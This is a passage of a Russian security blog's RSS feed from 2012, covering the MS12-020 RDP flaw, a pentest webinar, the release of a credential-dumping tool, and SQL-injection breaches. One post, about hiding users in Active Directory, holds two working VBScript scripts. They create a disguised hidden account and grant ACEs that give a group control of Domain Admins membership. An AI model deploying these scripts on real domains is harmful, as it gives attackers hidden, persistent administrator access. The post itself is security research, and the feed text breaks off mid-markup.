dir="ltr" style="text-align: left;" trbidi="on"&gt;Специальный выпуск, посвященный конференции &lt;a href="http://phdays.ru/"&gt;Positive Hack Days&lt;/a&gt; 2012;&lt;br /&gt;
hack the planet :)&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;br /&gt;
 &lt;object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="255" height="20" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"&gt;
                            &lt;param name="movie" value="http://www.esetnod32.ru/.media/mp3_player/player.swf?file=http://www.esetnod32.ru/download/podcast/ESET_Virus_Free_Zone_038.mp3&amp;showDownload=false" /&gt;                            &lt;param name="wmode" value="transparent" /&gt;                            &lt;embed wmode="transparent" width="255" height="20" src="http://www.esetnod32.ru/.media/mp3_player/player.swf?file=http://www.esetnod32.ru/download/podcast/ESET_Virus_Free_Zone_038.mp3&amp;showDownload=false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /&gt;
                        &lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
Скачать &lt;a href="http://www.esetnod32.ru/download/podcast/ESET_Virus_Free_Zone_038.mp3"&gt;mp3 файл&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-5622335338094371958?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-26T23:07:46.207+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://www.esetnod32.ru/download/podcast/ESET_Virus_Free_Zone_038.mp3" length="72859721" type="audio/mpeg" /><media:content url="http://www.esetnod32.ru/download/podcast/ESET_Virus_Free_Zone_038.mp3" fileSize="72859721" type="audio/mpeg" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Специальный выпуск, посвященный конференции Positive Hack Days 2012; hack the planet :) Скачать mp3 файл</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>Специальный выпуск, посвященный конференции Positive Hack Days 2012; hack the planet :) Скачать mp3 файл</itunes:summary><itunes:keywords>phdays, positive technologies, podcast</itunes:keywords></item><item><title>MS12-020: exploit available?</title><link>http://devteev.blogspot.com/2012/03/ms12-020-exploit-available.html</link><category>exploits</category><category>patch management</category><category>security</category><category>Microsoft</category><category>0day</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Thu, 15 Mar 2012 00:17:57 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-1207210351786202026</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Появилось первое упоминание про рабочий эксплоит к уязвимости&amp;nbsp;&lt;a href="http://technet.microsoft.com/ru-ru/security/bulletin/ms12-020"&gt;MS12-020&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-nQPi9Q2n_Qg/T2GU3hrSBlI/AAAAAAAABaE/L8AmTMbbf6w/s1600/ms12-020.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="366" src="http://4.bp.blogspot.com/-nQPi9Q2n_Qg/T2GU3hrSBlI/AAAAAAAABaE/L8AmTMbbf6w/s640/ms12-020.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Замечен по адресу:&amp;nbsp;&lt;a href="http://www.forgeting.com/archives/601.html"&gt;http://www.forgeting.com/archives/601.html&lt;/a&gt;&lt;br /&gt;
Источник:&amp;nbsp;&lt;a href="http://www.securitylab.ru/blog/personal/tecklord/21197.php"&gt;http://www.securitylab.ru/blog/personal/tecklord/21197.php&lt;/a&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Подтверждения или опровержения информации о рабочем сплоетсе пока нет. Если кто-то станет счастливым обладателем этого чуда, просьба стукнуться ко мне ;)&lt;br /&gt;
&lt;br /&gt;
К слову, о движухе в направлении разработки эксплоита под MS12-020. Желающие поднять 1451$ ( :D, прим. полет мысли) могут&amp;nbsp;присоединиться к его разработке в рамках этого проекта - &lt;a href="http://gun.io/open/48/metasploit-module-for-cve-2012-002"&gt;http://gun.io/open/48/metasploit-module-for-cve-2012-002&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-1207210351786202026?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-15T11:17:57.552+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-nQPi9Q2n_Qg/T2GU3hrSBlI/AAAAAAAABaE/L8AmTMbbf6w/s72-c/ms12-020.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">11</thr:total></item><item><title>MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution</title><link>http://devteev.blogspot.com/2012/03/ms12-012-vulnerabilities-in-remote.html</link><category>patch management</category><category>security</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 14 Mar 2012 14:24:06 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-3443771594675237179</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;a href="http://1.bp.blogspot.com/-D3-m_RHStb8/T2DSMQL1EaI/AAAAAAAABZ8/jg2C5cFOGSs/s1600/rdp.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-D3-m_RHStb8/T2DSMQL1EaI/AAAAAAAABZ8/jg2C5cFOGSs/s200/rdp.png" width="152" /&gt;&lt;/a&gt;Как обычно во второй вторник месяца компания Microsoft выпустила &lt;a href="http://technet.microsoft.com/ru-ru/security/bulletin/ms12-mar"&gt;пачку заплаток&lt;/a&gt; к линейке своих продуктов. Из всего списка бюллетеней по безопасности одной уязвимости, а это - &lt;a href="http://technet.microsoft.com/ru-ru/security/bulletin/ms12-020"&gt;MS12-020&lt;/a&gt;, был присвоен статус критической баги. "Обновление устраняет две обнаруженные &lt;b&gt;уязвимости в протоколе удаленного рабочего стола&lt;/b&gt; (RDP). Наиболее серьезная из этих уязвимостей &lt;b&gt;делает возможным удаленное выполнение кода&lt;/b&gt;, если злоумышленник отправляет уязвимой системе последовательность специально созданных пакетов RDP", сообщается на соответствующей &lt;a href="http://technet.microsoft.com/ru-ru/security/bulletin/ms12-020"&gt;странице&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
В очередной раз Windows (а вместе с ней и весь мир) в опасности или Microsoft просто шутит? Эксперты &lt;a href="http://isc.sans.org/diary/Why+We+Rated+the+MS12-020+Issue+with+RDP+Patch+Now+/12781"&gt;прогнозируют&lt;/a&gt;, что малварь, эксплуатирующая уязвимость ms12-020 появится менее чем через 30 дней. С другой стороны, парни, которые уже сделали бинарный анализ выпущенного патча находятся в недоумении, пологая, что дальше отказа в обслуживании дело не дойдет [&lt;a href="http://www.securitylab.ru/blog/personal/tecklord/21184.php"&gt;1&lt;/a&gt;, &lt;a href="http://exploitshop.wordpress.com/2012/03/13/ms12-020-vulnerabilities-in-remote-desktop-could-allow-remote-code-execution/"&gt;2&lt;/a&gt;]. Появится-ли новый RCE для серьезного покрытия версий винды вновь покажет время. Ждем-с :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-3443771594675237179?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-15T01:24:06.689+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-D3-m_RHStb8/T2DSMQL1EaI/AAAAAAAABZ8/jg2C5cFOGSs/s72-c/rdp.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Вебинар: Тестирование на проникновение в сетях Microsoft</title><link>http://devteev.blogspot.com/2012/03/microsoft.html</link><category>вебинары</category><category>pentest</category><category>positive technologies</category><category>тест на проникновение</category><category>security</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Mon, 12 Mar 2012 12:45:19 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-610005694421414508</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;В &lt;a href="http://www.ptsecurity.ru/ics/%D0%A2%D0%B5%D1%81%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20%D0%BD%D0%B0%20%D0%BF%D1%80%D0%BE%D0%BD%D0%B8%D0%BA%D0%BD%D0%BE%D0%B2%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%B2%20%D1%81%D0%B5%D1%82%D1%8F%D1%85%20Microsoft.ics"&gt;четверг&lt;/a&gt;&amp;nbsp;на этой неделе (15.03) проведу вебинар по теме реализации угроз в сетях Microsoft. Буду делиться практическим опытом :) Данную презентацию я уже рассказывал не так давно на&amp;nbsp;8-й встрече &lt;a href="https://www.defcon-russia.ru/"&gt;Defcon Russia Group&lt;/a&gt;, которая &lt;a href="http://devteev.blogspot.com/2012/02/drg-8-microsoft.html"&gt;проходила&lt;/a&gt;&amp;nbsp;в Москве. Но по причине двух последних событий [&lt;a href="http://devteev.blogspot.com/2012/02/0day-lsa.html"&gt;1&lt;/a&gt;, &lt;a href="http://devteev.blogspot.com/2012/03/backdoor-active-directory-iii.html"&gt;2&lt;/a&gt;], немного изменил содержимое в имеющейся презентации.&lt;br /&gt;
&lt;center&gt;&lt;div id="__ss_11975131" style="width: 425px;"&gt;&lt;strong style="display: block; margin: 12px 0 4px;"&gt;&lt;a href="http://www.slideshare.net/devteev/microsoft-v2" target="_blank" title="Тестирование на проникновение в сетях Microsoft (v.2)"&gt;Тестирование на проникновение в сетях Microsoft (v.2)&lt;/a&gt;&lt;/strong&gt; &lt;iframe frameborder="0" height="355" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/11975131" width="425"&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style="padding: 5px 0 12px;"&gt;View more &lt;a href="http://www.slideshare.net/thecroaker/death-by-powerpoint" target="_blank"&gt;PowerPoint&lt;/a&gt; from &lt;a href="http://www.slideshare.net/devteev" target="_blank"&gt;Dmitry Evteev&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;
Для бесплатного участия в вебинаре необходимо зарегистрироваться по &lt;a href="http://www.ptsecurity.ru/lab/webinars/registration/1867/"&gt;этой ссылке&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-610005694421414508?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-12T23:45:19.918+04:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Backdoor в Active Directory III</title><link>http://devteev.blogspot.com/2012/03/backdoor-active-directory-iii.html</link><category>research</category><category>security</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 10 Mar 2012 12:32:39 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-6683671161981743403</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Продолжая тему из серии "прячемся в каталоге MS LDAP" [&lt;a href="http://devteev.blogspot.com/2011/02/backdoor-active-directory.html"&gt;1&lt;/a&gt;,&lt;a href="http://devteev.blogspot.com/2012/01/backdoor-active-directory.html"&gt;2&lt;/a&gt;] нашел еще один замечательный способ скрыть свое присутствие от бдительного взора администратора домена. Речь идет про объект типа "&lt;b&gt;msPKI-Key-Recovery-Agent&lt;/b&gt;", который визуально выглядит, как системная организационная единица и ни как не выдает себя при не целевом поиске (например, через стандартные средства поиска по каталогу). Приведенный ниже сценарий позволяет создать "скрытого" пользователя, как показано на картинке.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-asNuAM9VngQ/T1u5oceyDQI/AAAAAAAABZ0/t4Ij4TNvX_M/s1600/ms-backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://3.bp.blogspot.com/-asNuAM9VngQ/T1u5oceyDQI/AAAAAAAABZ0/t4Ij4TNvX_M/s400/ms-backdoor.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;textarea class="xml" name="code" rows="50"&gt;&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  username = "PT"&amp;lt;br /&amp;gt;  password = "P@ssw0rd"&amp;lt;br /&amp;gt;  userDN = "cn=Program Data"&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN&amp;lt;br /&amp;gt;  Set objSysInfo = CreateObject("ADSystemInfo")&amp;lt;br /&amp;gt;  strUserDN = objSysInfo.userName&amp;lt;br /&amp;gt;  Set objUser = GetObject("LDAP://" &amp;amp; strUserDN)&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Set objRoot = GetObject("LDAP://rootDSE")&amp;lt;br /&amp;gt;  Set objContainer = GetObject("LDAP://" &amp;amp; userDN &amp;amp; "," &amp;amp; objRoot.Get("defaultNamingContext")) &amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Set objUserCreate = objContainer.Create("msPKI-Key-Recovery-Agent", "cn=Configuration")&amp;lt;br /&amp;gt;  objUserCreate.Put "sAMAccountName", username&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt;  objUserCreate.SetPassword password&amp;lt;br /&amp;gt;  objUserCreate.Put "userAccountControl", 66048&amp;lt;br /&amp;gt;  objUserCreate.Put "description", "Default location for configuration application data."&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; &lt;/textarea&gt;&lt;br /&gt;
&lt;br /&gt;
В совокупности с идеями, предлагаемыми &lt;a href="http://devteev.blogspot.com/2011/02/backdoor-active-directory.html"&gt;ранее&lt;/a&gt;, данный подход видится мне довольно перспективным.&lt;br /&gt;
&lt;br /&gt;
&lt;textarea class="xml" name="code" rows="50"&gt;&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  username = "PT"&amp;lt;br /&amp;gt;  password = "P@ssw0rd"&amp;lt;br /&amp;gt;  userDN = "cn=Program Data"&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  joinGroupDN = "cn=Terminal Server License Servers, cn=Builtin"&amp;lt;br /&amp;gt;  joinGroup = "BUILTIN\Terminal Server License Servers"&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  adminsGroup = "CN=Domain Admins,CN=Users"&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Dim objRoot, objContainer, objUser, objGroup, objSysInfo, strUserDN&amp;lt;br /&amp;gt;  Set objSysInfo = CreateObject("ADSystemInfo")&amp;lt;br /&amp;gt;  strUserDN = objSysInfo.userName&amp;lt;br /&amp;gt;  Set objUser = GetObject("LDAP://" &amp;amp; strUserDN)&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Set objRoot = GetObject("LDAP://rootDSE")&amp;lt;br /&amp;gt;  Set objContainer = GetObject("LDAP://" &amp;amp; userDN &amp;amp; "," &amp;amp; objRoot.Get("defaultNamingContext")) &amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Set objUserCreate = objContainer.Create("msPKI-Key-Recovery-Agent", "cn=Configuration")&amp;lt;br /&amp;gt;  objUserCreate.Put "sAMAccountName", username&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  objUserCreate.SetPassword password&amp;lt;br /&amp;gt;  objUserCreate.Put "userAccountControl", 66048&amp;lt;br /&amp;gt;  objUserCreate.Put "description", "Default location for configuration application data."&amp;lt;br /&amp;gt;  objUserCreate.SetInfo&amp;lt;br /&amp;gt;  On Error Resume Next&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  GroupAddAce joinGroupDN,username&amp;lt;br /&amp;gt;  GroupAddAce adminsGroup,joinGroup&amp;lt;br /&amp;gt;  GroupAddAce "CN=AdminSDHolder,CN=System",joinGroup&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  Function GroupAddAce(toGroup,forGroup)&amp;lt;br /&amp;gt;   Dim objSdUtil, objSD, objDACL, objAce&amp;lt;br /&amp;gt;   Set objGroup = GetObject ("LDAP://" &amp;amp; toGroup &amp;amp; "," &amp;amp; objRoot.Get("defaultNamingContext")) &amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;   Set objSdUtil = GetObject(objGroup.ADsPath)&amp;lt;br /&amp;gt;   Set objSD = objSdUtil.Get("ntSecurityDescriptor")&amp;lt;br /&amp;gt;   Set objDACL = objSD.DiscretionaryACL&amp;lt;br /&amp;gt;   Set objAce = CreateObject("AccessControlEntry")&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;   objAce.Trustee = forGroup&amp;lt;br /&amp;gt;   objAce.AceFlags = 0&amp;lt;br /&amp;gt;   objAce.AceType = 5&amp;lt;br /&amp;gt;   objAce.AccessMask = 32&amp;lt;br /&amp;gt;   objAce.Flags = 1&amp;lt;br /&amp;gt;   objAce.ObjectType = "{BF9679C0-0DE6-11D0-A285-00AA003049E2}"&amp;lt;br /&amp;gt;   objDacl.AddAce objAce&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;   objSD.DiscretionaryAcl = objDacl&amp;lt;br /&amp;gt;   objSDUtil.Put "ntSecurityDescriptor", Array(objSD)&amp;lt;br /&amp;gt;   objSDUtil.SetInfo&amp;lt;br /&amp;gt;  &amp;lt;br /&amp;gt;  End Function&amp;lt;br /&amp;gt; &amp;lt;br /&amp;gt; &lt;/textarea&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-6683671161981743403?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-11T00:32:39.605+04:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-asNuAM9VngQ/T1u5oceyDQI/AAAAAAAABZ0/t4Ij4TNvX_M/s72-c/ms-backdoor.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Windows Credentials Editor (WCE) 1.3beta released</title><link>http://devteev.blogspot.com/2012/03/windows-credentials-editor-wce-13beta.html</link><category>tools</category><category>Microsoft</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Sat, 10 Mar 2012 06:36:36 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-5245615908646384746</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Самые вкусные "плюшки" в сборке под названием &lt;a href="http://devteev.blogspot.com/2012/02/0day-lsa.html"&gt;mimikatz&lt;/a&gt;&amp;nbsp;в части дерганья открытых паролей в операционной системе под управлением Windows на днях были портированы в "швейцарский нож", известный под названием &lt;a href="http://www.ampliasecurity.com/research/wcefaq.html"&gt;Windows Credentials Editor&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QLS4_KiYG3Q/T1tfF7OKk8I/AAAAAAAABZs/U8Hpy8XzkOM/s1600/wce1.3beta.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://1.bp.blogspot.com/-QLS4_KiYG3Q/T1tfF7OKk8I/AAAAAAAABZs/U8Hpy8XzkOM/s400/wce1.3beta.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Прямая ссылка для скачивания:&amp;nbsp;WCE v1.3beta (32-bit) (&lt;a href="http://www.ampliasecurity.com/research/wce_v1_3beta.tgz"&gt;download&lt;/a&gt;)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-5245615908646384746?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-10T18:36:36.195+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-QLS4_KiYG3Q/T1tfF7OKk8I/AAAAAAAABZs/U8Hpy8XzkOM/s72-c/wce1.3beta.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure url="http://www.ampliasecurity.com/research/wce_v1_3beta.tgz" length="132264" type="application/x-gzip" /><media:content url="http://www.ampliasecurity.com/research/wce_v1_3beta.tgz" fileSize="132264" type="application/x-gzip" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Самые вкусные "плюшки" в сборке под названием mimikatz&amp;nbsp;в части дерганья открытых паролей в операционной системе под управлением Windows на днях были портированы в "швейцарский нож", известный под названием Windows Credentials Editor: Прямая ссылка дл</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry Evteev)</itunes:author><itunes:summary>Самые вкусные "плюшки" в сборке под названием mimikatz&amp;nbsp;в части дерганья открытых паролей в операционной системе под управлением Windows на днях были портированы в "швейцарский нож", известный под названием Windows Credentials Editor: Прямая ссылка для скачивания:&amp;nbsp;WCE v1.3beta (32-bit) (download)</itunes:summary><itunes:keywords>tools, Microsoft</itunes:keywords></item><item><title>Positive Technologies has successfully passed the PCI SSC ASV</title><link>http://devteev.blogspot.com/2012/03/positive-technologies-has-successfully.html</link><category>PCI DSS</category><category>positive technologies</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Tue, 06 Mar 2012 02:51:54 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-153129325260064452</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Компания &lt;a href="http://www.ptsecurity.ru/"&gt;Positive Technologies&lt;/a&gt; теперь тоже входит в элитный список вендоров, которые могут проводить &lt;a href="https://www.pcisecuritystandards.org/approved_companies_providers/approved_scanning_vendors.php"&gt;PCI DSS ASV сканирования&lt;/a&gt;. И даже больше! Positive Technologies &lt;a href="http://www.ptsecurity.ru/maxpatrol/"&gt;MaxPatrol&lt;/a&gt; полностью поддерживает формат ASV. О чем, собственно, я и буду хвастаться на &lt;a href="http://www.ptsecurity.ru/ics/%D0%92%D0%B5%D0%B1%D0%B8%D0%BD%D0%B0%D1%80%20%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5%20MaxPatrol%20%D0%B4%D0%BB%D1%8F%20%D0%B2%D1%8B%D0%BF%D0%BE%D0%BB%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F%20%D1%82%D1%80%D0%B5%D0%B1%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B9%20PCI%20DSS%20ASV%20%D0%BA%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D0%B8%D0%B8.ics"&gt;соответствующем вебинаре&lt;/a&gt; в июне этого года.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-m1WRHXRb-vg/T1Xr3Eo0uqI/AAAAAAAABZk/NsVWn1IZ8Ug/s1600/pci.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="640" src="http://4.bp.blogspot.com/-m1WRHXRb-vg/T1Xr3Eo0uqI/AAAAAAAABZk/NsVWn1IZ8Ug/s640/pci.png" width="516" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-153129325260064452?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-06T14:51:54.522+04:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-m1WRHXRb-vg/T1Xr3Eo0uqI/AAAAAAAABZk/NsVWn1IZ8Ug/s72-c/pci.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>UN.org, Skype.com, and Oracle.com Hacked by D35m0nd142</title><link>http://devteev.blogspot.com/2012/03/unorg-skypecom-and-oraclecom-hacked-by.html</link><category>инциденты</category><category>взлом</category><category>hackers</category><category>web security</category><author>noreply@blogger.com (Dmitry Evteev)</author><pubDate>Wed, 29 Feb 2012 13:45:11 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1151777387719242828.post-8457148011217472150</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Что-то давно я не писал про SQL-инъекции и инциденты, связанные с ними. И потому не смог отказать себе в удовольствии посмаковать последние события, опубликованные на &lt;a href="http://news.softpedia.com/news/UN-org-Skype-com-and-Oracle-com-Hacked-by-D35m0nd142-255812.shtml"&gt;news.softpedia.com&lt;/a&gt;. Шутка ли, что хакер под псевдонимом &lt;a href="https://twitter.com/#!/D35m0nd142"&gt;D35m0nd142&lt;/a&gt;, вооружившись последней версией &lt;a href="http://www.acunetix.com/"&gt;Acunetix WVS&lt;/a&gt; и средством для автоматизации проведения атаки через blind SQLi (&lt;a href="http://itsecteam.com/en/projects/project1.htm"&gt;Havij&lt;/a&gt;?) сумел натворить много дел [&lt;a href="http://pastebin.com/u/D35M0ND142"&gt;1&lt;/a&gt;] на столь известных ресурсах, как например &lt;a href="http://oracle.com/"&gt;Oracle.com&lt;/a&gt; и &lt;a href="http://skype.com/"&gt;Skype.com&lt;/a&gt;:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-mwInWsJy1-g/T06bErHCO9I/AAAAAAAABZQ/mIWvjXCx6Ao/s1600/1-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="512" src="http://1.bp.blogspot.com/-mwInWsJy1-g/T06bErHCO9I/AAAAAAAABZQ/mIWvjXCx6Ao/s640/1-1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-flSZSIOedgA/T06bJoja_3I/AAAAAAAABZY/mmD78EdyS2E/s1600/1-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="460" src="http://3.bp.blogspot.com/-flSZSIOedgA/T06bJoja_3I/AAAAAAAABZY/mmD78EdyS2E/s640/1-2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Вот такая она информационная &lt;strike&gt;защищенность&lt;/strike&gt; безопасность столь интересных ресурсов. На фоне этого инцидента вспоминается разбор полетов Anonymous, опубликованный на днях компанией &lt;a href="http://www.imperva.com/"&gt;Imperva&lt;/a&gt; [&lt;a href="http://www.imperva.com/docs/HII_The_Anatomy_of_an_Anonymous_Attack.pdf"&gt;2&lt;/a&gt;]. Слишком уж он напоминает сценарий нашего героя. С другой стороны, "атаки, они такие атаки"...&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1151777387719242828-8457148011217472150?l=devteev.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-01T01:45:11.823+04:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-mwInWsJy1-g/T06bErHCO9I/AAAAAAAABZQ/mIWvjXCx6Ao/s72-c/1-1.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total><enclosure url="http://www.imperva.com/docs/HII_The_Anatomy_of_an_Anonymous_Attack.pdf" length="2188644" type="application/pdf" /><media:content url="http://www.imperva.com/docs/HII_The_Anatomy_of_an_Anonymous_Attack.pdf" fileSize="2188644" type="application/pdf" /><itunes:explicit>no</itunes:explicit><itunes:subtitle>Что-то давно я не писал про SQL-инъекции и инциденты, связанные с ними. И потому не смог отказать себе в удовольствии посмаковать последние события, опубликованные на news.softpedia.com. Шутка ли, что хакер под псевдонимом D35m0nd142, вооружившись последн</itunes:subtitle><itunes:author>noreply@blogger.com (Dmitry 